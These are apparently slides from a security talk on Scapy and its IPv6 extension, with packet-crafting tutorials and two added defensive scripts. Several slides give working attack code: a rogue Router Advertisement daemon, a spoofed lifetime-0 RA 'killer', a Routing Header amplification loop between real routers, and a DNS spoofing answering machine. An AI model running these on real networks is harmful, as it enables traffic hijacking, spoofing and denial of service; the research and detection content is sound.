[Figure: graph of the traceroute hops, clustered by AS: 7018 [ATT-INTERNET4 - AT&T WorldNet], 8075 [MICROSOFT-CORP---MSN-AS-BLOCK], 12076 [HOTMAIL-AS - Hotmail Corporati], 109 [CISCO-EU-109 Cisco Systems Glo], 3356 [LEVEL3 Level 3 Communications], 714 [APPLE-ENGINEERING - Apple Comp]. The three end nodes 17.112.152.32, 198.133.219.25 and 207.46.19.30 are labelled "80: SA". A second view zooms in on the HOTMAIL-AS and APPLE-ENGINEERING clusters.]

High-Level commands
Traceroute graphing, 3D toy
>>> ans.trace3D()

High-Level commands
ARP ping
>>> arping("172.16.15.0/24")
Begin emission:
*Finished to send 256 packets.
*
Received 2 packets, got 2 answers, remaining 254 packets
00:12:3f:0a:84:5a 172.16.15.64
00:12:79:3d:a3:6a 172.16.15.254
(<ARPing: UDP:0 TCP:0 ICMP:0 Other:2>,
<Unanswered: UDP:0 TCP:0 ICMP:0 Other:254>)

Implementing a new protocol
Each layer is a subclass of Packet
Each layer is described by a list of fields
This description is sufficient for assembly and disassembly
Each field is an instance of a Field subclass
Each field has at least a name and a default value
Example
    class Test(Packet):
        name = "Test protocol"
        fields_desc = [
            ByteField("field1", 1),
            XShortField("field2", 2),
            IntEnumField("field3", 3, {1: "one", 10: "ten"}),
        ]

Use Scapy in your own tools
Executable interactive add-on
You can extend Scapy in a separate file and benefit from Scapy interaction
Example
    #! /usr/bin/env python

    from scapy import *

    class Test(Packet):
        name = "Test packet"
        fields_desc = [ ShortField("test1", 1),
                        ShortField("test2", 2) ]

    def make_test(x, y):
        return Ether()/IP()/Test(test1=x, test2=y)

    interact(mydict=globals(), mybanner="Test add-on v3.14")

Use Scapy in your own tools
External script
You can make your own autonomous Scapy scripts
Example
    #! /usr/bin/env python

    import sys
    if len(sys.argv) != 2:
        print "Usage: arping <net>\n eg: arping 192.168.1.0/24"
        sys.exit(1)

    from scapy import srp,Ether,ARP,conf
    conf.verb=0
    ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")
                  /ARP(pdst=sys.argv[1]),
                  timeout=2)

    for s,r in ans:
        print r.sprintf("%Ether.src% %ARP.psrc%")

Continuous traffic monitoring
use sniff() and the prn parameter
the callback function will be applied to every packet
BPF filters will improve performance
store=0 prevents sniff() from storing every packet
Example
    #! /usr/bin/env python
    from scapy import *

    def arp_monitor_callback(pkt):
        if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at
            return pkt.sprintf("%ARP.hwsrc% %ARP.psrc%")

    sniff(prn=arp_monitor_callback, filter="arp", store=0)

Structural differences with IPv4
New header format
from 14 to 8 fields
IPv6 header (40 octets, drawn 32 bits wide):
  Version (4 bits) | Traffic Class (8 bits) | Flow Label (20 bits)
  Payload Length (16 bits) | Next Header (8 bits) | Hop Limit (8 bits)
  Source IPv6 Address (128 bits)
  Destination IPv6 Address (128 bits)
Extension Header Information (variable size), starting with its own Next Header (8 bits)
Payload

Structural differences with IPv4
Chaining and extensions
Goodbye IP options, welcome IPv6 extensions!
[Figure: three numbered example packets built from IPv6, Routing Header, Fragment Header, ESP, TCP, UDP and ICMPv6 blocks; in each block a Next header field points to the header that follows]

Functional differences with IPv4
Forget all you knew for IPv4
Autoconfiguration Mechanisms
  ARP has gone. Extended by Neighbor Discovery
  Broadcast replaced by link-local scope multicast
End-to-End principle
  Releasing core routers from intensive computation.
    Fragmentation is performed by end nodes
    Checksum computation is performed by end nodes at L4
    IPv6 header fixed size simplifies handling (or not).
  NAT makes no sense under IPv6 : no states ⇒ no SPoF.

A tour of IPv6 support
Generalities
Works on Linux, FreeBSD, NetBSD and Mac OS X
Requires a recent version of Scapy
Provided under GNU GPLv2 License
Developed with Guillaume Valadon (Esaki Lab / LIP6)
Link : http://namabiiru.hongo.wide.ad.jp/scapy6
Remarks, bug reports and patches are welcome !!!

A tour of IPv6 support
IPv6 support : make it natural
s/IP/IPv6/g
$ sudo scapy6
Welcome to Scapy (1.0.4.84beta)
IPv6 enabled
>>> a=IPv6(dst="www.netbsd.org")/TCP(dport=[21,80])
>>> a
<IPv6 nh=TCP dst=2001:4f8:4:7:2e0:81ff:fe52:9a6b |<TCP dport=[21, 80] |>>
>>> send(a)
..
Sent 2 packets.
>>> a.dst="2001:6c8:6:4::7" # ftp.freebsd.org
>>> a[TCP].dport=21
>>> a
<IPv6 nh=TCP dst=2001:6c8:6:4::7 |<TCP dport=ftp |>>
>>> b=sr1(a, verbose=0)
>>> b.src
2001:6c8:6:4::7
>>>

A tour of IPv6 support
Conversations
>>> a=sniff(filter="ip6")
>>> a
<Sniffed: UDP:0 TCP:219 ICMP:0 Other:3>
>>> a.conversations(getsrcdst=lambda x:(x[IPv6].src, x[IPv6].dst), \
                    type="png", target="> /tmp/conversations.png")
[Figure: conversation graph whose nodes are 2001:db8:67df:1::2, 2001:db8:67df:1:20e:1fff:feda:4660, ff02::1:ff00:2 and 2001:db8:67df:1::1]

A tour of IPv6 support
IPv6 support : simplifying IPv6 packet crafting
Scapy6 spares you the need to care about :
  L2 address resolution (ND support);
  L2/L3 source/destination address selection;
  Name to address translation (aka DNS resolution);
  L4 checksum computation;
  Default values filling (static/dynamic ones);
  Hop Limit values in specific cases (ND);
  Layer bindings (Next Header field filling);
  ...
⇒ You keep your mind focused on fields of interest !!

A tour of IPv6 support
A simple example
The one line Router Advertisement daemon
>>> sendp(Ether()/IPv6()/ICMPv6ND_RA()/ \
          ICMPv6NDOptPrefixInfo(prefix="2001:db8:cafe:deca::", \
                                prefixlen=64)/ \
          ICMPv6NDOptSrcLLAddr(lladdr="00:b0:b0:67:89:AB"), \
          loop=1, inter=3)
What Scapy6 did for you today :
  You provided the 3 most important values (prefix, prefix length and router Link layer Address).
  Scapy6 filled addresses, Hop Limit, Next Header, Flags, checksum, length fields in a consistent way.

Other simple examples
What's your name ?
>>> someaddr=["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",
"2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",
"2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]
>>> for addr in someaddr:
...     a = sr1(IPv6(dst=addr)/ICMPv6NIQueryName(data=addr), verbose=0)
...     print a.sprintf( "%-35s,src%: %data%")
...
2001:6c8:6:4::7 : ['ftp.beastie.tdk.net.']
2001:500::1035 : ['pao1b.f.root-servers.org.']
2001:1ba0:0:4::1 : ['rimfall.dialtelecom.sk.']
2001:2f0:104:1:2e0:18ff:fea8:16f5 : ['updraft3.jp.freebsd.org.']
2001:e40:100:207::2 : ['ring.sakura.ad.jp.']
2001:7f8:2:1::18 : ['z2.internal.securanetworks.net.']
2001:4f8:0:2::e : ['sf1.isc.org.']
2001:4f8:0:2::d : ['webster.isc.org.']

Other simple examples
It gets even more funny with multicast
>>> a=sr(IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1"))
...
fe80::20a:5eff:fe00:1349 : ['assam.ipv6.test.lab.']
fe80::20a:4aff:fe3d:4c27 : ['lotus.ipv6.test.lab.']
fe80::20a:6cff:fe27:1c49 : ['yunnan.ipv6.test.lab.']
fe80::20a:5bff:fe20:1d5a : ['darjeeling.ipv6.test.lab.']
The one line Router Advertisement daemon killer
>>> send(IPv6(src=server)/ICMPv6ND_RA(routerlifetime=0), loop=1, inter=1)

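A detection-side counterpart to the two Router Advertisement one-liners above, added here as an example and not taken from the slides or from Scapy6: it parses RA bodies with the standard library and audits them against a baseline of expected routers. The baseline router (fe80::1, MAC 00:00:5e:00:53:01, prefix 2001:db8:1::/64), the function names and every sample message are constructed assumptions; the rogue prefix and link-layer address reuse the values shown on the slide.

```python
import ipaddress
import struct

RA_TYPE, OPT_SRC_LLADDR, OPT_PREFIX_INFO = 134, 1, 3


def parse_ra(msg):
    """Parse an ICMPv6 Router Advertisement, starting at the ICMPv6 type octet."""
    if len(msg) < 16 or msg[0] != RA_TYPE:
        raise ValueError("not a Router Advertisement")
    _cur_hlim, _flags, lifetime = struct.unpack("!BBH", msg[4:8])
    ra = {"lifetime": lifetime, "lladdr": None, "prefixes": []}
    off = 16                                  # options follow the 16 fixed octets
    while off + 2 <= len(msg):
        otype, olen = msg[off], msg[off + 1] * 8   # length is in 8-octet units
        if olen == 0 or off + olen > len(msg):     # zero length would loop forever
            raise ValueError("malformed ND option")
        body = msg[off:off + olen]
        if otype == OPT_SRC_LLADDR and olen == 8:
            ra["lladdr"] = ":".join("%02x" % b for b in body[2:8])
        elif otype == OPT_PREFIX_INFO and olen == 32:
            text = "%s/%d" % (ipaddress.IPv6Address(body[16:32]), body[2])
            ra["prefixes"].append(str(ipaddress.IPv6Network(text, strict=False)))
        off += olen
    return ra


def audit(observations, routers, prefixes):
    """Compare observed RAs with the expected state of the link.

    observations: (Ethernet source MAC, IPv6 source, RA bytes) tuples.
    routers: {router link-local address: expected MAC}; prefixes: expected set.
    """
    alerts = []
    for mac, src, msg in observations:
        try:
            ra = parse_ra(msg)
        except ValueError as exc:
            alerts.append((src, "malformed RA: %s" % exc))
            continue
        if src not in routers:
            alerts.append((src, "RA from unknown router"))
        elif mac != routers[src]:
            alerts.append((src, "router address used from MAC %s" % mac))
        if ra["lifetime"] == 0:
            alerts.append((src, "router lifetime 0 withdraws the default route"))
        if ra["lladdr"] and ra["lladdr"] != routers.get(src):
            alerts.append((src, "unexpected link-layer address option %s" % ra["lladdr"]))
        alerts += [(src, "unexpected prefix %s" % p)
                   for p in ra["prefixes"] if p not in prefixes]
    return alerts


def make_ra(lifetime, prefix=None, lladdr=None):
    """Build a constructed RA body for the demo (checksum left at 0, never sent)."""
    msg = struct.pack("!BBHBBHII", RA_TYPE, 0, 0, 64, 0, lifetime, 0, 0)
    if prefix:
        net = ipaddress.IPv6Network(prefix)
        msg += struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, net.prefixlen,
                           0xC0, 86400, 14400, 0) + net.network_address.packed
    if lladdr:
        msg += bytes([OPT_SRC_LLADDR, 1]) + bytes.fromhex(lladdr.replace(":", ""))
    return msg


def demo():
    """Run the audit over four constructed observations."""
    routers = {"fe80::1": "00:00:5e:00:53:01"}          # assumed baseline
    prefixes = {"2001:db8:1::/64"}
    observations = [
        # legitimate periodic RA
        ("00:00:5e:00:53:01", "fe80::1",
         make_ra(1800, "2001:db8:1::/64", "00:00:5e:00:53:01")),
        # RA carrying the prefix and lladdr of the slide's one-line RA daemon
        ("00:b0:b0:67:89:ab", "fe80::2b0:b0ff:fe67:89ab",
         make_ra(1800, "2001:db8:cafe:deca::/64", "00:b0:b0:67:89:AB")),
        # lifetime-0 RA claiming the router's address from another MAC
        ("00:00:5e:00:53:99", "fe80::1", make_ra(0)),
        # truncated option with length 0
        ("00:00:5e:00:53:01", "fe80::1", make_ra(1800) + b"\x03\x00"),
    ]
    return audit(observations, routers, prefixes)


if __name__ == "__main__":
    for source, reason in demo():
        print(source, "-", reason)
```

A lifetime-0 RA sent by the real router is also reported, since only the operator knows whether that router was meant to stop advertising.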
ICMPv6 Support
ICMPv6 was promoted (1/2)
ICMPv6 <TAB> <TAB>
ICMPv6EchoRequest     ICMPv6ND_INDAdv            /* Inverse Neighbor Discovery */
ICMPv6EchoReply       ICMPv6ND_INDSol

ICMPv6DestUnreach     ICMPv6NDOptHAInfo          /* Mobile IPv6 */
ICMPv6ParamProblem    ICMPv6NDOptMTU             /* Link MTU in RA */
ICMPv6TimeExceeded    ICMPv6NDOptPrefixInfo      /* Main RA content */
ICMPv6PacketTooBig    ICMPv6NDOptRedirectedHdr
                      ICMPv6NDOptSrcAddrList
ICMPv6ND_RS           ICMPv6NDOptSrcLLAddr       /* L2 Addr in RS/NS */
ICMPv6ND_RA           ICMPv6NDOptTgtAddrList     /* L2 Addr in NS */
ICMPv6ND_NS           ICMPv6NDOptDstLLAddr
ICMPv6ND_NA           ICMPv6NDOptAdvInterval
ICMPv6ND_Redirect     ICMPv6NDOptUnknown         /* Generic fallback */

ICMPv6 Support
ICMPv6 was promoted (2/2)
ICMPv6 <TAB> <TAB>
ICMPv6HAADReply    /* Mobile IPv6 */                   ICMPv6NIQuery
ICMPv6HAADRequest                                      ICMPv6NIQueryIPv4
ICMPv6MPAdv                                            ICMPv6NIQueryIPv6
ICMPv6MPSol                                            ICMPv6NIQueryLocal
                                                       ICMPv6NIQueryName
ICMPv6MLDone       /* Multicast Listener Discovery */  ICMPv6NIReply
ICMPv6MLQuery                                          ICMPv6NIReplyRefuse
ICMPv6MLReport                                         ICMPv6NIReplySuccess
                                                       ICMPv6NIReplySuccessIPv4
ICMPv6MRD_Advertisement                                ICMPv6NIReplySuccessIPv6
ICMPv6MRD_Solicitation                                 ICMPv6NIReplySuccessName
ICMPv6MRD_Termination                                  ICMPv6NIReplyUnknown

Basic Routing Header example
What's inside
    class IPv6OptionHeaderRouting(IPv6OptionHeader):
        name = "IPv6 Option Header Routing"
        fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
                        ByteField("len", None),
                        ByteField("type", 0),
                        ByteField("segleft", None),
                        BitField("reserved", 0, 32),
                        IP6RoutingHeaderListField("addresses", []) ]
        overload_fields = { IPv6: { "nh": 43 }}
sr1() Example
>>> a = sr1(IPv6(dst="2001:4f8:4:7:2e0:81ff:fe52:9a6b")/ \
            IPv6OptionHeaderRouting(addresses=["2001:78:1:32::1", "2001:20:82:203:fea5:385"])/ \
            ICMPv6EchoRequest(data=RandString(7)), verbose=0)
>>> a.src
"2001:20:82:203:fea5:385"
>>>

Remote and boomerang traceroute
>>> waypoint = "2001:301:0:8002:203:47ff:fea5:3085"
>>> target = "2001:5f9:4:7:2e0:81ff:fe52:9a6b"
>>> traceroute6(waypoint, minttl=15 , maxttl=34, \
                l4=IPv6OptionHeaderRouting(addresses=[target])/ \
                ICMPv6EchoRequest(data=RandString(7)))
   2001:301:0:8002:203:47ff:fea5:3085 :IER
15 2001:319:2000:5000::92 3
16 2001:301:0:1c04:230:13ff:feae:5b 3
17 2001:301:0:4800::7800:1 3
18 2001:301:0:8002:203:47ff:fea5:3085 3
19 2001:301:0:2::6800:1 3
20 2001:301:0:1c04:20e:39ff:fee3:3400 3
21 2001:301:133::1dec:0 3
22 2001:301:901:7::18 3
23 2001:301:0:1800::2914:1 3
24 2001:319:2000:3002::21 3
25 2001:319:0:6000::19 3
26 2001:319:0:2000::cd 3
27 2001:519:0:2000::196 3
28 2001:519:0:5000::1e 3
29 2001:5f9:0:1::3:2 3
30 2001:5f9:0:1::5:2 3
31 2001:5f9:0:1::f:1 3
32 2001:5f9:0:1::14:2 3
33 2001:5f9:4:7:2e0:81ff:fe52:9a6b 129
34 2001:5f9:4:7:2e0:81ff:fe52:9a6b 129
(<Traceroute: ICMP:0 UDP:0 TCP:0 Other:20>,
<Unanswered: ICMP:0 UDP:0 TCP:0 Other:0>)
[Figure: Source, Waypoint and Target connected through IPv6 routers; legend: natural path, forced path (using RH0)]

Funny game
Rules of the game
Goal
  Keep an IPv6 packet as long as possible in IPv6 Internet routing infrastructure.
Rules
  No L4 help : only IPv6 L3 infrastructure hijacking
  No cheating : explicit tunnels are banned (2002::/16, ...)
  No abuse : it's only a game !!
Clue
  It's based on Routing Header mechanism ...

Funny game
Solution
Current high score
>>> addr1 = '2001:4830:ff:12ea::2'
>>> addr2 = '2001:360:1:10::2'
>>> zz=time.time(); \
    a=sr1(IPv6(dst=addr2, hlim=255)/ \
    IPv6OptionHeaderRouting(addresses=[addr1, addr2]*43)/ \
    ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80); \
    print "%.2f seconds" % (time.time() - zz)
32.29 seconds
>>>
Link saturation / Amplification effect
  100 KBytes/s upload bandwidth,
  32 seconds storage between the 2 routers
  ⇒ 1.6 MBytes/sec of traffic in both directions on the link

Routing Header processing

| OS | Host | Router | Firewallable | Deactivable |
|---|---|---|---|---|
| Linux 2.6 | dropped | routed | not reliably | no |
| FreeBSD 6.1 | routed | routed | not reliably | no |
| Mac OS X | routed | routed | no | no |
| OpenBSD 3.8 | routed | routed | no | no |
| XP SP2 | dropped | - | - | - |
| Vista | dropped | - | - | - |
| Cisco IOS | - | routed | not reliably | yes |
| Juniper | - | routed | no | no |
In the pipe: IKEv2 and Teredo

Teredo
External extension for Scapy6
Most of the work already done (70%)
Waiting for 2001::/32 prefix to be propagated
Expected with/before Windows® Vista™ release

IKEv2
Challenging extension on many aspects
A playground for state and crypto support in Scapy
Expected before a stable Racoon2 release ;-)
3D visualization/interactions: A picture is worth a thousand words
Conclusion
IPv6 is coming, with a lot of things to look at.
It’s both ...
... simple (design)
... complicated (extensions, transition mechanisms)
It’s like no one learned from IPv4 problems. Implementors are making the same mistakes again (source routing)
We need tools to test stacks and products
Turning ideas into PoC is a question of seconds with Scapy6
The End
That’s all folks! Thanks for your attention.
You can reach us at:
Useful links:
Scapy: http://www.secdev.org/projects/scapy
Scapy6: http://namabiiru.hongo.wide.ad.jp/scapy6
UTscapy: http://www.secdev.org/projects/UTscapy
These slides: http://www.secdev.org/
Appendices
6 References
7 Additional material
    Learning Python in 2 slides
    Answering machines
8 Zoomed frames
Learning Python in 2 slides (1/2)
This is an int (signed, 32bits) : 42
This is a long (signed, infinite): 42L
This is a str : "bell\x07\n" or 'bell\x07\n' (" ⇐⇒ ')
This is a tuple (immutable): (1,4, "42")
This is a list (mutable): [4,2, "1"]
This is a dict (mutable): { "one":1 , "two":2 }
Learning Python in 2 slides (2/2)
No block delimiters. Indentation does matter.

if cond1:
    instr
    instr
elif cond2:
    instr
else:
    instr

while cond:
    instr
    instr

try:
    instr
except exception:
    instr
else:
    instr

def fact(x):
    if x == 0:
        return 1
    else:
        return x*fact(x-1)

for var in set:
    instr

lambda x,y: x+y
Answering machines
An answering machine enables you to quickly design a stimulus/response daemon
Already implemented: fake DNS server, ARP spoofer, DHCP daemon, FakeARPd, Airpwn clone

Interface description
class Demo_am(AnsweringMachine):
    function_name = "demo"
    filter = "a bpf filter if needed"
    def parse_options(self, ...):
        ....
    def is_request(self, req):
        # return 1 if req is a request
    def make_reply(self, req):
        # return the reply for req
Answering machines: Using answering machines
The class must be instantiated
The parameters given to the constructor become default parameters
The instance is a callable object whose default parameters can be overloaded
Once called, the instance loops, sniffs and answers stimuli

Side note:
Declaring an answering machine class automatically creates a function, named after the function_name class attribute, that instantiates and runs the answering machine. This is done thanks to the ReferenceAM metaclass.
Answering machines: DNS spoofing example
class DNS_am(AnsweringMachine):
    function_name="dns_spoof"
    filter = "udp port 53"

    def parse_options(self, joker="192.168.1.1", zone=None):
        if zone is None:
            zone = {}
        self.zone = zone
        self.joker=joker      # address returned for names missing from zone

    def is_request(self, req):
        # a DNS message with qr == 0 is a query
        return req.haslayer(DNS) and req.getlayer(DNS).qr == 0

    def make_reply(self, req):
        ip = req.getlayer(IP)
        dns = req.getlayer(DNS)
        # swap addresses and ports so the reply goes back to the querier
        resp = IP(dst=ip.src, src=ip.dst)/UDP(dport=ip.sport, sport=ip.dport)
        rdata = self.zone.get(dns.qd.qname, self.joker)
        resp /= DNS(id=dns.id, qr=1, qd=dns.qd,
                    an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=rdata))
        return resp
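Seen from the defending side: an answering machine like the one above replies to every query it sniffs, so, assuming the genuine server's reply also reaches the client, one transaction gets two different answers. The following added example (not from the slides or from Scapy; all function names and sample values are constructed) parses raw DNS responses in Python 3 and reports transactions answered inconsistently.

```python
# Added example: names and sample values are constructed, not Scapy API.
import struct

def read_name(msg, off):
    """Decode a possibly compressed DNS name; return (name, offset just past it)."""
    labels, end = [], None
    for _ in range(64):                      # bounded walk, so pointer loops cannot hang us
        n = msg[off]
        if n >= 0xC0:                        # compression pointer: 14-bit offset into msg
            end = end or off + 2
            off = ((n & 0x3F) << 8) | msg[off + 1]
        elif n == 0:
            return ".".join(labels).lower() + ".", end or off + 1
        else:
            labels.append(msg[off + 1:off + 1 + n].decode("ascii", "replace"))
            off += 1 + n
    raise ValueError("pointer loop or oversized name")

def parse_response(msg):
    """Return (txid, qname, sorted A-record addresses), or None if msg is not a response."""
    txid, flags, qdcount, ancount = struct.unpack("!HHHH", msg[:8])
    if not flags & 0x8000 or qdcount != 1:
        return None
    qname, off = read_name(msg, 12)
    addrs, off = [], off + 4                 # skip QTYPE and QCLASS
    for _ in range(ancount):
        _, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        if rtype == 1 and rdlen == 4:        # A record
            addrs.append(".".join(map(str, msg[off + 10:off + 14])))
        off += 10 + rdlen
    return txid, qname, tuple(sorted(addrs))

def conflicting_answers(captured):
    """captured: (client_ip, DNS payload) pairs. Return transactions answered inconsistently."""
    seen = {}
    for client, payload in captured:
        try:
            parsed = parse_response(payload)
        except (IndexError, ValueError, struct.error):
            continue                         # malformed payload: no evidence either way
        if parsed:
            seen.setdefault((client,) + parsed[:2], set()).add(parsed[2])
    return {key: sorted(ans) for key, ans in seen.items() if len(ans) > 1}

def make_response(txid, qname, addr, ttl):
    """Constructed sample data: a response carrying one A record for qname."""
    q = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\0"
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + bytes(map(int, addr.split(".")))
    return struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0) + q + struct.pack("!HH", 1, 1) + rr
```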
[Figure: NAT enumeration: www.apple.com]
[Figure: NAT enumeration: www.cisco.com]
[Figure: NAT enumeration: www.google.com]
[Figure: NAT enumeration: www.microsoft.com]
[Figure: NAT enumeration: www.yahoo.fr]
[Figure: NAT enumeration: www.kernel.org]